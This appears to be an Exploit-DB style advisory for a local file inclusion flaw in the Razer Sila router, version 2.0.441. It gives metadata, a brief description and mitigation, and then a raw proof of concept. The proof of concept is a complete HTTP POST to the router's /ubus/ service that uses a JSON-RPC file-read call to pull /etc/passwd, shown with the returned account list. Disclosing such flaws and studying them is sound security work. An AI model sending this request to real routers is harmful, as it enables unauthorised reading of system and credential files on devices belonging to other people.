Razer Sila - Local File Inclusion (LFI)

vendor:

Razer Sila

by:

Kevin Randall

7.5

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Razer Sila

Affected Version From: RazerSila-2.0.441_api-2.0.418

Affected Version To: RazerSila-2.0.441_api-2.0.418

Patch Exists: YES

Related CWE:

CPE: h:razer:razer_sila

Metasploit:

Other Scripts:

Platforms Tested: Razer Sila Router

2022

Razer Sila – Local File Inclusion (LFI)

Razer Sila is vulnerable to a Local File Inclusion (LFI) vulnerability. An attacker can send a malicious POST request to the router's ubus service, which will allow the attacker to read any file on the router. This can be used to gain access to sensitive information such as the router's password file.

Mitigation:

To mitigate this vulnerability, users should ensure that the router is running the latest version of the firmware and that all security patches are applied.

Source

Exploit-DB raw data:

# Exploit Title: Razer Sila - Local File Inclusion (LFI)
# Google Dork: N/A
# Date: 4/9/2022
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
# Version: RazerSila-2.0.441_api-2.0.418
# Tested on: Razer Sila Router
# CVE N/A

# Proof of Concept

# Request
POST /ubus/ HTTP/1.1
Host: 192.168.8.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://192.168.8.1
Referer: https://192.168.8.1/
Te: trailers
Connection: close

{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}

# Reponse
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Content-Length: 537

{"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}